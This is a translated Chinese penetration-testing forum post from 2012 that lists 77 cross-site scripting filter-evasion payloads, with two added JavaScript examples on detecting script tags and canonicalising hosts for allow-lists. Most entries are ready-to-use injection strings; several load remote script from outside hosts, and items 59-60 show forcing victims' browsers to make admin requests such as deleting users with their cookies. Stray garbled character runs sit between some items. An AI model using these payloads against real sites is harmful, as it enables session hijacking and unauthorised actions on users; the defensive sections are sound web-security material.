中国网络渗透测试联盟

Title: XSS cross-site scripting attack roundup

Author: admin    Posted: 2012-9-5 14:56

It seems there is not much material on XSS over at t00ls; I saw something good and copied it over, in case anyone needs to bookmark it.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript directive
<IMG SRC="javascript:alert('XSS');">

(3) IMG tag, no quotes and no semicolon
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entities (here the semicolon is required)
<IMG SRC=javascript:alert(&quot;XSS&quot;)>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (get the codes from a charcode calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) "UTF-8 Unicode encoding": every character of javascript:alert('XSS') as a decimal HTML character reference, with semicolons (calculator)
<IMG SRC=&#106;&#97;&#118;..omitted..&#83;&#39;&#41;>

(9) Long (7-digit, zero-padded) decimal references, which need no semicolons (calculator)
<IMG SRC=&#0000106&#0000097&#0000118..omitted..&#0000083&#0000039&#0000041>

(10) Hex references, also without semicolons (calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>

(11) Embedded tab splitting "javascript" (a literal TAB between jav and ascript)
<IMG SRC="jav	ascript:alert('XSS');">

(12) Embedded encoded tab
<IMG SRC="jav&#x09;ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav&#x0A;ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav&#x0D;ascript:alert('XSS');">

(15) Multi-line injected JavaScript, the extreme case: the same tag with the IMG, SRC and = tokens and every single character of the attribute value on its own line; the browser strips the line breaks before it resolves the URL
<IMG SRC="javascript:alert('XSS')">

(16) Working around an input length limit (all the pieces must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2 (null bytes are basically useless here in practice, because there is nowhere to make use of them)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in IMG SRC
<IMG SRC=" &#14;  javascript:alert('XSS');">
, X  x$ Z& j4 [* k3 d* ~2 L
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and a few other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2, with a protocol-relative URL
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes (when your input lands inside a JavaScript string literal)
\";alert('XSS');//
, I  E! ^( k# s+ _3 S; A! `, i: T" x# z
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY ONLOAD=alert('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) Style sheet via LINK
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) list-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META refresh with an extra URL parameter
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with an extra character in front of the URL (any of the character codes 1-32, 34, 39, 160, 8192-8193, 12288 and 65279 works)
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with the expression split by a comment
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (anything that is an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE tag background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE with expression (the payload is truncated in this copy)
exppression(alert("XSS"))'>

(53) STYLE tag background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed a Flash movie that carries the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) In Flash, ActionScript can smuggle in your XSS code by assembling it at runtime
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the .HTC file must sit on the same server as the page carrying the XSS
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If ".js" is filtered, put the JavaScript in a file with an image extension and point SRC at it (the SRC is empty in this copy)
<SCRIPT SRC=""></SCRIPT>

(59) IMG with an embedded command: every victim's browser fetches the URL with the victim's cookies attached, so whatever a.php does on a GET runs with the victim's session (a forced request, not command execution on the server)
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG with an embedded command, part 2 (a.jpg on your own server): a redirect rule like this one in .htaccess turns the harmless-looking image URL into a request for an admin action on the target site, again sent with the victim's cookies
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Getting past symbol filters with HTML quote encapsulation: a filter that stops at the first ">" sees a SCRIPT tag without SRC
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67) Splitting the tag with document.write, so the string "<SCRIPT SRC=" never appears in the page source
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
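Items 61 to 67 are aimed at detectors that locate a SCRIPT tag with a regular expression and stop at the first ">". The following is an added example in JavaScript, not part of the original post; the function names are our own. It puts that naive check beside a small tokenizer that follows the HTML5 attribute rules (a quoted value may contain ">", a stray "=" or a quote where a name is expected starts an attribute, and backtick is not a quote character). Run over the six encapsulation vectors and the document.write split, copied from the items above into a SAMPLES table, it also shows which of them a standards-compliant tokenizer still resolves to a script with a SRC: under these rules item 62 ends its tag at the first ">" and item 65 only worked in legacy IE, and item 67 is invisible to any static check, so it has to be stopped at runtime, for instance by a Content Security Policy.

```javascript
// Added example, not part of the original post. Function names are ours.

// The kind of check items 61-66 defeat: stops at the first '>'.
const naiveHasExternalScript = html => /<script[^>]*\bsrc\s*=/i.test(html);

const isWs = c => c === " " || c === "\t" || c === "\n" || c === "\r" || c === "\f";

// Attributes of the first start tag named tagName, as a Map, following the
// HTML5 tokenizer states (before attribute name, attribute name, before
// attribute value, quoted / unquoted value). Returns null if no such tag.
function attributesOfFirstTag(html, tagName) {
  const open = new RegExp(`<${tagName}(?=[\\s/>])`, "i").exec(html);
  if (!open) return null;
  let i = open.index + open[0].length;
  const attrs = new Map();
  while (i < html.length) {
    while (i < html.length && (isWs(html[i]) || html[i] === "/")) i++;
    if (i >= html.length || html[i] === ">") break;
    // an unexpected '=' here becomes the first character of the name (per spec);
    // '"' and "'" are not terminators, so they are simply appended to the name
    let name = html[i] === "=" ? html[i++] : "";
    while (i < html.length && !isWs(html[i]) && !"/>=".includes(html[i])) name += html[i++];
    while (i < html.length && isWs(html[i])) i++;
    let value = "";
    if (html[i] === "=") {
      i++;
      while (i < html.length && isWs(html[i])) i++;
      const q = html[i];
      if (q === '"' || q === "'") {                 // quoted: a '>' inside is data
        const end = html.indexOf(q, i + 1);
        value = html.slice(i + 1, end === -1 ? html.length : end);
        i = end === -1 ? html.length : end + 1;
      } else {                                      // unquoted (backtick included): ends at ws or '>'
        while (i < html.length && !isWs(html[i]) && html[i] !== ">") value += html[i++];
      }
    }
    attrs.set(name.toLowerCase(), value);
  }
  return attrs;
}

function tokenizerHasExternalScript(html) {
  const attrs = attributesOfFirstTag(html, "script");
  return attrs !== null && Boolean(attrs.get("src"));
}

// Constructed inputs: a plain tag as control, the six encapsulation vectors
// (61-66) and the document.write split (67), copied from the list above.
const SAMPLES = {
  plain: '<SCRIPT SRC="http://3w.org/xss.js"></SCRIPT>',
  v61: '<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>',
  v62: '<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>',
  v63: '<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>',
  v64: '<SCRIPT "a=\'>\'" SRC="http://3w.org/xss.js"></SCRIPT>',
  v65: '<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>',
  v66: '<SCRIPT a=">\'>" SRC="http://3w.org/xss.js"></SCRIPT>',
  v67: '<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>',
};

// Naive versus tokenizer verdict for every sample.
function compare() {
  const out = {};
  for (const [key, html] of Object.entries(SAMPLES)) {
    out[key] = { naive: naiveHasExternalScript(html), tokenizer: tokenizerHasExternalScript(html) };
  }
  return out;
}

console.table(compare());
```

The regex flags only the plain tag; the tokenizer additionally recovers 61, 63, 64 and 66, and reports 62, 65 and 67 as tags without a SRC, which is also what a current browser makes of them. The practical conclusion is the usual one: do not detect markup with regular expressions; parse it with a real HTML parser (or sanitise with a library that does), and rely on CSP for what no static check can see.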
% F) M- \1 p8 P& z6 {. u5 ~
(68) URL evasion: an IP address instead of a hostname
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding of the hostname (3w.org percent-encoded)
<A HREF="http://%33%77%2E%6F%72%67">XSS</A>

(70) IP as a single decimal number (dword; 3232235521 is 192.168.0.1)
<A HREF="http://3232235521">XSS</A>

(71) IP in hex
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding: a newline and tabs inside the scheme and host, and each octet in a different base (resolves to 66.102.7.147)
<A HREF="h
tt	p://6	6.000146.0x7.147/">XSS</A>
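Items 68 to 73 work because a browser accepts an IPv4 literal in dword, hex, octal or mixed form and drops tabs and newlines from the URL before it looks at the host, so an allow-list that compares against the attacker's spelling compares the wrong thing. The following is an added example in JavaScript, not part of the original post; the helper names are our own. It reproduces the WHATWG URL rules for IPv4 literals, extracts the host the way the parser will see it, and builds a host allow-list check on the canonical forms, run on the hosts above. Node's built-in URL class applies the same rules, so the test cross-checks one case against it.

```javascript
// Added example, not part of the original post. Helper names are ours.

// One dotted part in decimal, 0x-prefixed hex or leading-zero octal;
// NaN if it is not numeric in any of those forms (WHATWG "IPv4 number parser").
function parseIpv4Part(part) {
  let radix = 10, digits = part;
  if (/^0[xX]/.test(part)) { radix = 16; digits = part.slice(2); }
  else if (part.length > 1 && part[0] === "0") { radix = 8; digits = part.slice(1); }
  if (digits === "") return radix === 16 ? 0 : NaN;   // "0x" alone is 0 per spec
  const valid = { 10: /^[0-9]+$/, 16: /^[0-9a-fA-F]+$/, 8: /^[0-7]+$/ }[radix];
  return valid.test(digits) ? parseInt(digits, radix) : NaN;
}

// Canonical "a.b.c.d" for any IPv4 literal spelling (1 to 4 parts, the last
// part carrying the remaining octets), or null when the host is a name.
function canonicalIpv4(host) {
  const parts = host.split(".");
  if (parts.length > 1 && parts[parts.length - 1] === "") parts.pop();   // trailing dot
  if (parts.length > 4) return null;
  const nums = parts.map(parseIpv4Part);
  if (nums.some(Number.isNaN)) return null;                               // a name, not a literal
  const head = nums.slice(0, -1), last = nums[nums.length - 1];
  if (head.some(n => n > 255) || last >= 256 ** (5 - nums.length)) return null;
  let addr = last;
  head.forEach((n, i) => { addr += n * 256 ** (3 - i); });
  return [24, 16, 8, 0].map(shift => (addr >>> shift) & 255).join(".");
}

// The host of an href as a browser will see it: tab/LF/CR removed everywhere,
// leading and trailing controls and spaces trimmed, IPv4 literal folded, names
// lower-cased with the trailing dot removed. Userinfo and port are dropped;
// IPv6 literals are not handled. Returns null when there is no authority to
// compare: a relative URL, or a non-hierarchical scheme such as javascript:,
// which a scheme allow-list must handle (host matching cannot).
function canonicalHost(href) {
  const cleaned = href.replace(/[\t\n\r]/g, "").replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "");
  const m = /^(?:[a-z][a-z0-9+.-]*:)?\/\/([^/?#]*)/i.exec(cleaned);
  if (!m) return null;
  const host = m[1].split("@").pop().split(":")[0].toLowerCase();
  return canonicalIpv4(host) ?? host.replace(/\.$/, "");
}

// Allow-list check that survives every spelling above: canonical against canonical.
function isAllowedHost(href, allowedHosts) {
  const h = canonicalHost(href);
  return h !== null && allowedHosts.some(a => (canonicalIpv4(a) ?? a.toLowerCase()) === h);
}

// Constructed inputs: the hosts from items 70-73 and two names from 74-76.
const SPELLINGS = ["3232235521", "0xc0.0xa8.0x00.0x01", "0300.0250.0000.0001",
                   "66.000146.0x7.147", "www.google.com.", "//www.google.com/"];
for (const s of SPELLINGS) console.log(s.padEnd(22), "->", canonicalIpv4(s) ?? canonicalHost(s) ?? s);
```

The first three spellings fold to 192.168.0.1 and the mixed one to 66.102.7.147, which is what the platform URL parser returns for them too; compare allow-lists only after that step, and never by substring match on the raw href.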

(74) Dropping "http:" (protocol-relative URL)
<A HREF="//www.google.com/">XSS</A>

(75) Dropping "www"
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS name with the trailing dot
<A HREF="http://www.google.com./">XSS</A>

(77) javascript: link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>




Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2